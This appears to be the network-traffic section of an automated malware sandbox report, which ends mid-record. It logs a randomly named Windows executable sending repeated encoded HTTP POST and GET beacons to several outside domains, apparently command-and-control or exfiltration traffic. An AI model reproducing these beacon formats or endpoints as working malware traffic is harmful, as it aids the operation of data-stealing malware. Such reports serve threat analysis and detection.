Tn0QxeAlNyeGWa5luKdBA+Wp0I6oL8JC2Ie4IsUV6PJny0Lz4QB9U50GkJmq6z2T5HZgq2sJh0qPjUFuMcU2qBoxPoexnsZ [TRUNCATED]
Jan 10, 2025 20:20:28.037740946 CET	608	IN	HTTP/1.1 501 Unsupported method ('POST') Server: nginx Date: Fri, 10 Jan 2025 19:20:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED] Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49991	217.70.184.50	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:29.981981039 CET	593	OUT	GET /ead0/?vNTT0=e8zLx&_6yxCX=OwnSiQTonAdwVTeqlw0c+DdVJwXlJPsoxE88ohWtB+WUIw034wY61NPL5vanrW433FkI4Wm16OMLJLHvwknBhrmN7KgNDD+8nl5ENQfO4rN6vw62ks37+HoPu6Jjp4YWnA== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.sunnyz.store Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Jan 10, 2025 20:20:30.582027912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 19:20:30 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Content-Security-Policy: default-src 'self'; script-src 'nonce-7f572908acb847f5930066d33d474f07'; Vary: Accept-Language Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 37 66 35 37 32 39 30 38 61 63 62 38 34 37 66 35 39 33 30 30 36 36 64 33 33 64 34 37 34 66 30 37 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED] Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-7f572908acb847f5930066d33d474f07';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
Jan 10, 2025 20:20:30.582075119 CET	1236	IN	Data Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
Jan 10, 2025 20:20:30.582112074 CET	160	IN	Data Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27 Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49992	13.228.81.39	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:36.116164923 CET	868	OUT	POST /dc08/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.muasamgiare.click Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 207 Cache-Control: no-cache Origin: http://www.muasamgiare.click Referer: http://www.muasamgiare.click/dc08/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 67 50 30 6c 55 67 69 2f 6c 4d 75 56 6f 74 30 52 33 33 58 6a 32 78 75 7a 59 74 65 6a 52 63 63 31 75 67 79 45 65 75 54 32 51 72 39 64 39 5a 62 39 44 61 69 34 75 7a 72 76 77 30 30 66 61 2f 6d 46 39 6d 6b 43 6f 70 54 4b 39 49 50 7a 31 4e 53 68 6f 36 79 4f 6a 54 74 63 54 59 55 79 2b 6c 6d 79 61 36 58 41 51 59 74 61 44 62 44 78 76 76 46 77 39 67 51 37 59 47 37 6a 64 6f 6f 62 46 32 72 63 6c 79 44 57 35 6e 6c 57 56 57 75 4e 73 4d 55 6a 69 77 68 44 30 53 79 69 4b 55 6e 46 4a 32 37 50 58 2b 78 2b 6e 6b 44 68 62 73 41 59 71 62 6d 70 4f 78 67 78 6f 4a 6e 78 77 33 34 3d Data Ascii: _6yxCX=H6OXM/o3+l9agP0lUgi/lMuVot0R33Xj2xuzYtejRcc1ugyEeuT2Qr9d9Zb9Dai4uzrvw00fa/mF9mkCopTK9IPz1NSho6yOjTtcTYUy+lmya6XAQYtaDbDxvvFw9gQ7YG7jdoobF2rclyDW5nlWVWuNsMUjiwhD0SyiKUnFJ27PX+x+nkDhbsAYqbmpOxgxoJnxw34=
Jan 10, 2025 20:20:37.040646076 CET	368	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 19:20:36 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.muasamgiare.click/dc08/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49993	13.228.81.39	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:38.658575058 CET	888	OUT	POST /dc08/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.muasamgiare.click Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 227 Cache-Control: no-cache Origin: http://www.muasamgiare.click Referer: http://www.muasamgiare.click/dc08/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 4d 31 75 45 69 45 66 76 54 32 52 72 39 64 79 4a 62 30 41 71 69 78 75 7a 6d 4d 77 32 51 66 61 2f 79 46 39 6b 38 43 76 65 50 4e 38 59 50 78 39 74 53 6a 31 71 79 4f 6a 54 74 63 54 59 42 6c 2b 6b 4f 79 61 4c 6e 41 52 38 78 62 66 72 44 79 6f 76 46 77 73 77 51 6e 59 47 37 64 64 70 6b 39 46 77 33 63 6c 33 6e 57 35 32 6c 56 63 57 75 50 6f 4d 56 64 6a 46 59 37 7a 7a 57 64 41 53 6d 35 58 47 4c 72 62 6f 41 55 39 47 4c 4a 49 4d 73 67 36 49 75 65 66 42 42 59 79 71 33 42 75 67 76 43 53 71 49 4e 53 36 62 63 4b 6b 43 48 75 2f 79 2b 45 6e 64 37 Data Ascii: _6yxCX=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqM1uEiEfvT2Rr9dyJb0AqixuzmMw2Qfa/yF9k8CvePN8YPx9tSj1qyOjTtcTYBl+kOyaLnAR8xbfrDyovFwswQnYG7ddpk9Fw3cl3nW52lVcWuPoMVdjFY7zzWdASm5XGLrboAU9GLJIMsg6IuefBBYyq3BugvCSqINS6bcKkCHu/y+End7
Jan 10, 2025 20:20:39.798208952 CET	368	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 19:20:39 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.muasamgiare.click/dc08/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49994	13.228.81.39	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:41.207231045 CET	1905	OUT	POST /dc08/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.muasamgiare.click Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1243 Cache-Control: no-cache Origin: http://www.muasamgiare.click Referer: http://www.muasamgiare.click/dc08/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 48 36 4f 58 4d 2f 6f 33 2b 6c 39 61 68 76 6b 6c 57 44 4b 2f 31 63 75 53 32 64 30 52 39 58 58 6e 32 78 71 7a 59 73 71 4e 57 71 45 31 75 32 71 45 64 4d 37 32 58 62 39 64 78 4a 62 35 41 71 6a 7a 75 7a 2f 46 77 32 73 31 61 35 2b 46 37 48 30 43 71 73 6e 4e 33 59 50 78 2f 74 53 69 6f 36 79 68 6a 54 39 59 54 59 52 6c 2b 6b 4f 79 61 49 2f 41 42 59 74 62 64 72 44 78 76 76 45 6b 39 67 51 62 59 47 7a 53 64 70 67 4c 46 6a 76 63 6c 58 58 57 2f 45 39 56 58 57 75 33 76 4d 56 56 6a 46 63 6b 7a 7a 62 73 41 53 36 48 58 45 72 72 5a 66 52 76 69 30 54 73 4c 64 52 4d 33 70 69 4d 49 45 68 6c 36 62 50 75 76 54 66 47 61 35 34 56 64 50 48 63 66 51 44 7a 2f 49 57 77 4e 6d 63 72 64 44 41 55 6e 6d 2f 52 6f 4e 2f 72 67 6e 45 49 32 6c 6a 45 42 68 78 68 38 52 58 6e 49 75 51 30 32 68 71 66 64 30 32 78 47 59 64 53 37 6c 58 51 36 46 71 64 51 4f 44 7a 34 76 4b 59 78 71 6d 64 73 31 32 6e 6e 4d 62 76 4a 72 76 37 34 55 54 34 48 50 71 4d 76 39 39 33 46 58 73 52 42 32 34 4b 53 38 2b 79 62 63 43 63 4d 38 63 6a 44 31 47 [TRUNCATED] Data Ascii: _6yxCX=H6OXM/o3+l9ahvklWDK/1cuS2d0R9XXn2xqzYsqNWqE1u2qEdM72Xb9dxJb5Aqjzuz/Fw2s1a5+F7H0CqsnN3YPx/tSio6yhjT9YTYRl+kOyaI/ABYtbdrDxvvEk9gQbYGzSdpgLFjvclXXW/E9VXWu3vMVVjFckzzbsAS6HXErrZfRvi0TsLdRM3piMIEhl6bPuvTfGa54VdPHcfQDz/IWwNmcrdDAUnm/RoN/rgnEI2ljEBhxh8RXnIuQ02hqfd02xGYdS7lXQ6FqdQODz4vKYxqmds12nnMbvJrv74UT4HPqMv993FXsRB24KS8+ybcCcM8cjD1GUrNpMDKuDaHwx536ZpM6JlQk0RrgPC9enppI9VgMBoT+BKRoHpwrwCWkGEWq/yVOEuYrd1PyQQwdzufJ++n3g2C+EhOuGTQOwz4t8VhxksCAAvIq65w0Imp6itMPEQ6zxYvQkyYM827i9BumHbLqy9eqfUVwWfKznbx9ZtV5v2sKj94miij+fxoWujNsrS0Rbu2wZzEiBtgdNGrnHkLXWQferItuQMfJLWiAkH00/4rPjxaF+YqhOsARx9AteYOdILOsfYr93rM5na4paLPU7Fu3fMMm5O7sKc3avlP8jbmGMDYlBXPnDml7QTnq32h19XpLjNQHsb1TUaDtfK7bZL0nWIPOni3NmzJWjumeGOnFOM6YIqmbi3FsT2pw7H8kee/YLEXz0FvR3S6RT19+k7svHfekuRKTVtltxZDEPyM+VIXUfk0mpSmUsZYv/Bw8A0rh33ZuF49HxBPUkA6oW5+OnrQZCPFNRzuXpFtXPXuEV2HadPbCndx318PFyJkuJFZMEW9rqO5aup2llAihEA76IoMCbQguGJPGJs/Sc/DJresyYAFPEvY61COorNQUsEfpMX9iQmhYwqfWPW5hw0SyZjY/3ucHjP9VOE5+uCm9rn3hrZx2oWDZJgyrnYg51ePUuOYcCy4rFsH8Y2yr7LtQygXRCh+Sfj [TRUNCATED]
Jan 10, 2025 20:20:42.148300886 CET	368	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 19:20:41 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.muasamgiare.click/dc08/ Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49995	13.228.81.39	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:43.748008013 CET	598	OUT	GET /dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z05Tnrv+b0LyIlhV4f69ltmWPUKvodMcjYbnCl+ENwjRpaA==&vNTT0=e8zLx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Host: www.muasamgiare.click Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7)
Jan 10, 2025 20:20:44.724793911 CET	520	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Fri, 10 Jan 2025 19:20:44 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.muasamgiare.click/dc08/?_6yxCX=K4m3PKR19259jK4EK1P0lrWLqd0y31/RgB+Ra8HyZbA6ylGAas28Oq8W0qL+J5Tllh3R0W9eHcyUnmETvv/z05Tnrv+b0LyIlhV4f69ltmWPUKvodMcjYbnCl+ENwjRpaA==&vNTT0=e8zLx Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49996	13.248.169.48	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:49.779175043 CET	871	OUT	POST /wvsm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sfantulandrei.info Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 207 Cache-Control: no-cache Origin: http://www.sfantulandrei.info Referer: http://www.sfantulandrei.info/wvsm/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 4c 52 68 57 74 50 71 4b 46 37 64 4c 4b 39 4c 4f 6f 41 75 36 47 64 59 74 70 37 31 68 4b 2b 70 70 68 56 78 44 75 35 67 4d 46 6d 73 41 69 44 63 43 41 7a 50 72 4f 72 79 74 31 6e 46 76 58 38 76 32 35 38 37 51 70 67 2b 65 72 67 69 2b 6e 43 31 68 33 46 75 31 4c 77 61 48 77 39 59 45 59 64 72 6e 52 6b 6c 78 64 6c 48 6d 50 58 6c 77 71 5a 76 53 62 7a 74 68 47 33 49 59 34 73 50 69 2f 53 49 79 6f 77 75 2b 74 75 6c 75 6b 7a 5a 51 44 6c 52 2f 76 59 74 76 56 52 74 69 6d 6f 61 7a 70 74 35 6f 77 4f 73 50 50 43 34 65 46 75 64 37 32 42 6a 42 38 72 45 58 6f 35 37 69 37 6e 30 3d Data Ascii: _6yxCX=K3B/WoIvcrplLRhWtPqKF7dLK9LOoAu6GdYtp71hK+pphVxDu5gMFmsAiDcCAzPrOryt1nFvX8v2587Qpg+ergi+nC1h3Fu1LwaHw9YEYdrnRklxdlHmPXlwqZvSbzthG3IY4sPi/SIyowu+tulukzZQDlR/vYtvVRtimoazpt5owOsPPC4eFud72BjB8rEXo57i7n0=
Jan 10, 2025 20:20:50.252084970 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49997	13.248.169.48	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:52.331444979 CET	891	OUT	POST /wvsm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sfantulandrei.info Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 227 Cache-Control: no-cache Origin: http://www.sfantulandrei.info Referer: http://www.sfantulandrei.info/wvsm/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4d 39 70 68 77 56 44 76 38 4d 4d 4c 47 73 41 32 54 63 48 66 6a 4f 6c 4f 72 2b 6c 31 6b 64 76 58 39 50 32 35 35 48 51 70 7a 57 64 70 77 69 34 75 69 31 5a 30 31 75 31 4c 77 61 48 77 39 4d 39 59 64 54 6e 51 57 78 78 48 41 7a 6c 52 48 6c 2f 38 4a 76 53 66 7a 74 6c 47 33 49 2b 34 75 36 48 2f 51 77 79 6f 78 65 2b 73 37 46 76 75 7a 5a 57 4d 46 51 49 6a 36 45 31 52 68 31 62 68 61 76 79 6f 66 6c 72 38 59 64 6c 56 67 77 32 57 4f 78 44 6d 53 72 32 74 62 6c 2b 79 61 72 53 6c 77 68 65 4c 44 5a 69 5a 44 38 4c 46 73 37 4f 49 76 52 54 70 66 48 56 Data Ascii: _6yxCX=K3B/WoIvcrplRxRWiPWKAbdMGdLO9wumGdUtp6AkKM9phwVDv8MMLGsA2TcHfjOlOr+l1kdvX9P255HQpzWdpwi4ui1Z01u1LwaHw9M9YdTnQWxxHAzlRHl/8JvSfztlG3I+4u6H/Qwyoxe+s7FvuzZWMFQIj6E1Rh1bhavyoflr8YdlVgw2WOxDmSr2tbl+yarSlwheLDZiZD8LFs7OIvRTpfHV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49998	13.248.169.48	80	1400	C:\Program Files (x86)\cLezqmgZOfiCBIukGLZAqHisQybOixoAacgTtePimRdfLFbBiTWNocrCW\HMKEBhehjTFHSE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:20:54.878449917 CET	1908	OUT	POST /wvsm/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.5 Host: www.sfantulandrei.info Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1243 Cache-Control: no-cache Origin: http://www.sfantulandrei.info Referer: http://www.sfantulandrei.info/wvsm/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Local IDS7) Data Raw: 5f 36 79 78 43 58 3d 4b 33 42 2f 57 6f 49 76 63 72 70 6c 52 78 52 57 69 50 57 4b 41 62 64 4d 47 64 4c 4f 39 77 75 6d 47 64 55 74 70 36 41 6b 4b 4e 46 70 67 44 74 44 75 66 55 4d 49 47 73 41 71 6a 63 